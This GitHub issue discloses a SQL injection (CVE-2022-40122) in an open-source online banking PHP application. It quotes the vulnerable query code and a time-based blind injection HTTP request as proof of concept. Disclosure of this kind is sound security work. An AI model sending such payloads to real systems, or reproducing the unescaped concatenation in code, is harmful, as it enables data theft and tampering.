Headline
CVE-2022-40122: Found a vulnerability · Issue #15 · zakee94/online-banking-system
Online Banking System v1.0 was discovered to contain a SQL injection vulnerability via the cust_id parameter at /net-banking/edit_customer_action.php.
Vulnerability file address
net-banking/edit_customer_action.php from line 16,The $_GET[‘cust_id’] parameter is controllable, the parameter cust_id can be passed through get, and the $_GET[‘cust_id’] is not protected from sql injection, line 59 if (($conn->query($sql0) === TRUE)) { ?> made a sql query,resulting in sql injection
… … … if (isset($_GET[‘cust_id’])) { $_SESSION[‘cust_id’] = $_GET[‘cust_id’]; }
$fname = mysqli\_real\_escape\_string($conn, $\_POST\["fname"\]);
$lname = mysqli\_real\_escape\_string($conn, $\_POST\["lname"\]);
$dob = mysqli\_real\_escape\_string($conn, $\_POST\["dob"\]);
$aadhar = mysqli\_real\_escape\_string($conn, $\_POST\["aadhar"\]);
$email = mysqli\_real\_escape\_string($conn, $\_POST\["email"\]);
$phno = mysqli\_real\_escape\_string($conn, $\_POST\["phno"\]);
$address = mysqli\_real\_escape\_string($conn, $\_POST\["address"\]);
$branch = mysqli\_real\_escape\_string($conn, $\_POST\["branch"\]);
$acno = mysqli\_real\_escape\_string($conn, $\_POST\["acno"\]);
$pin = mysqli\_real\_escape\_string($conn, $\_POST\["pin"\]);
$cus\_uname = mysqli\_real\_escape\_string($conn, $\_POST\["cus\_uname"\]);
$cus\_pwd = mysqli\_real\_escape\_string($conn, $\_POST\["cus\_pwd"\]);
$sql0 = "UPDATE customer SET first\_name = '$fname',
last\_name = '$lname',
dob = '$dob',
aadhar\_no = '$aadhar',
email = '$email',
phone\_no = '$phno',
address = '$address',
branch = '$branch',
account\_no = '$acno',
pin = '$pin',
uname = '$cus\_uname',
pwd = '$cus\_pwd'
WHERE cust\_id=".$\_SESSION\['cust\_id'\];
… … … if (($conn->query($sql0) === TRUE)) { ?> … … …
POC
GET /net-banking/edit_customer_action.php?cust_id=666 AND (SELECT 5721 FROM (SELECT(SLEEP(5)))pcwq) HTTP/1.1 Host: www.bank.net User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1
Attack results pictures